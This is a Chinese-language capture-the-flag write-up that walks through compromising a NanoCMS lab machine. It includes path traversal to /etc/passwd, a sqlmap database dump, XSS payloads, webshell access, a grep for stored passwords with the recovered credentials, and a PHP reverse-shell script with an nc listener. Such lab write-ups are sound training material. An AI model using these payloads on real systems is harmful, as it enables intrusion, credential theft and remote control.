靶机CTF5wp
目录扫描
1.nmap -sS -sV -O -p- 192.168.126.132
2.dirsearch -u "http://" -x 400-500
敏感信息泄露
1.通过扫描有info.php
该 phpinfo 页面已经严重泄露了服务器内部信息,属于高风险敏感信息泄露。
2.http://192.168.126.132
点击blog
看见nanoCMS
搜索发现敏感文件/data/pagesdata.txt
admin/shannon
任意文件读取
加了个‘
include 会将指定的文件载入并执行里面的程序;重复引用加载多次。
include_once 函数会将指定的文件载入并执行里面的程序;此行为和 include 语句类似,唯一区别是如果该文件中已经被包含过,则不会再次包含。
所以此页面存在任意文件读取。
在“=”后面添加“../”,可以多但是不要少。之后访问“/etc/passwd”,要用“%00”进行截断。
http://192.168.126.132/?page=../../../../../ ../../../../etc/passwd%00
sql
脱裤
sqlmap -u "http://192.168.126.132/list/" --data="name=aaa&email=bbb&phone=ccc&org=ddd" -D mysql -T user --dump
xss
1.需要单引号闭合,在不同的位置。第二个语句如果需要弹出字符,需要加单引号包裹。
<script>alert(fff)</script><script>alert(2)</script>
2.
'><script>alert('1')</script>
3.
4.
5.
<script>alert(1)</script>
6.</textarea><script>alert('qaz')</script>
RCE
文件保存位置如下
pages/111111.php
下来使用蚁剑进行连接,点击右键,添加数据。
虚拟终端上查看当前的用户
提权
敏感信息提权
连接蚁剑后,
进行敏感信息搜索
grep -R -i password /home/* 2> /dev/null
常用于系统管理员快速查找可能包含密码信息的配置文件、脚本或日志
1. grep
• 基本功能:文本搜索工具,默认在文件中查找匹配指定模式的行,并将这些行打印出来。
2. -R
• 含义:递归搜索。
• 作用:让 grep 不仅搜索指定的文件,还会进入目录的子目录,搜索其中的所有文件。如果没有 -R,/home/* 展开后如果是目录,grep 会报错并跳过。
3. -i
• 含义:忽略大小写(ignore case)。
• 作用:使搜索不区分大小写,即 password、Password、PASSWORD 等都会被匹配。
4. password
• 含义:要搜索的模式(字符串)。
• 作用:grep 会在每个文件中查找包含该字符串的行。
5. /home/*
• 含义:搜索路径。
• 作用:Shell 会将 /home/* 展开为 /home 目录下的所有非隐藏文件和目录的列表(例如 /home/user1、/home/user2 等)。grep 会针对这些路径进行搜索(如果是目录且使用了 -R,则会递归进入)。
• 注意:如果 /home 下没有匹配项(例如空目录),通配符可能保持原样,导致 grep 报错,但错误会被重定向丢弃。
6. 2> /dev/null
• 含义:标准错误重定向。
• 2>:表示将文件描述符 2(标准错误,stderr)的输出重定向到指定位置。
• /dev/null:是一个特殊的设备文件,写入它的任何数据都会被丢弃(常被称为“黑洞”)。
• 作用:将命令执行过程中的错误信息(如“权限不足无法读取文件”、“没有此类文件或目录”等)全部丢弃,不在终端显示。这样终端上只会显示搜索结果,不会显示大量权限拒绝的干扰信息。
找到rootpassword
去看哪个网址cat /home/patrick/.tomboy/481bca0d-7206-45dd-a459-a72ea1131329.note
发现密码50$cent
反弹shell
反弹 Shell(Reverse Shell)是网络安全和渗透测试中常用的一种技术,指目标机器主动连接攻击者机器,从而让攻击者获得一个命令行交互界面。这与传统的“正向连接”(攻击者主动连接目标)相反。
为什么需要反弹 Shell?
- 防火墙/NAT 限制:目标机器可能位于内网或开启了防火墙,阻止外部主动连接(入站连接被拦截),但通常允许出站连接(如访问 Web、DNS)。
- 动态 IP 或隧道:攻击者 IP 不固定,或者需要绕过网络限制,让目标主动回连更灵活。
- 权限维持:反弹 Shell 可作为后门,在获得初始访问后建立持久化控制。
假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。远程桌面,web服务,ssh,telnet等等,都是正向连接。那么什么情况下正向连接不太好用了呢?
1、对方主机在局域网内,从外网无法直接访问
2、对方主机上存在WAF,对主动连接发来的请求数据检测严格,而对向外发出的请求不进行检测或检测较少。
3、对方的ip会动态改变,你不能持续控制。
4、对方由于防火墙等限制,对方机器只能发送请求,不能接收请求。
5、对于病毒,木马,受害者什么时候能中招,对方的网络环境是什么样的,什么时候开关机,都是未知,所以建立一个服务端,让恶意程序主动连接,才是上策。
那么反弹就很好理解了, 攻击者指定服务端,受害者主机主动连接攻击者的服务端程序,就叫反弹连接。在渗透测试过程中,得到webshell后一般我们会反弹shell
原理:
A主机开启9090端口的tcp服务
B主机连接到A主机的9090的tcp服务
A主机通过tcp服务把命令发到B主机
B主机读取命令并且在bash中执行
B主机把执行结果发给A主机
这样就可以在A主机中'操控'B主机了
shell:
<?php
$ip = "主机ip地址";
$port = "主机端口";
$sock = fsockopen($ip, $port);
$descriptorspec = array(
0 => $sock,
1 => $sock,
2 => $sock
);
$process = proc_open('/bin/sh', $descriptorspec, $pipes);
proc_close($process);
?>
首先必须监听
nc -lvnp 8888
Python 升级为交互式 Shell
python -c 'import pty; pty.spawn("/bin/bash")'
# 1. python -c
# python:调⽤ Python 解释器
# -c:执⾏后⾯字符串中的 Python 代码
# 2. 'import pty; pty.spawn("/bin/bash")'
# 这是要执⾏的 Python 代码,分两部分:
# 3. import pty
# 导入 Python 的 pty 模块(伪终端⼯具)
# 4. pty.spawn("/bin/bash")
# spawn() 函数创建⼀个新的进程
# /bin/bash:启动 bash shell
拿下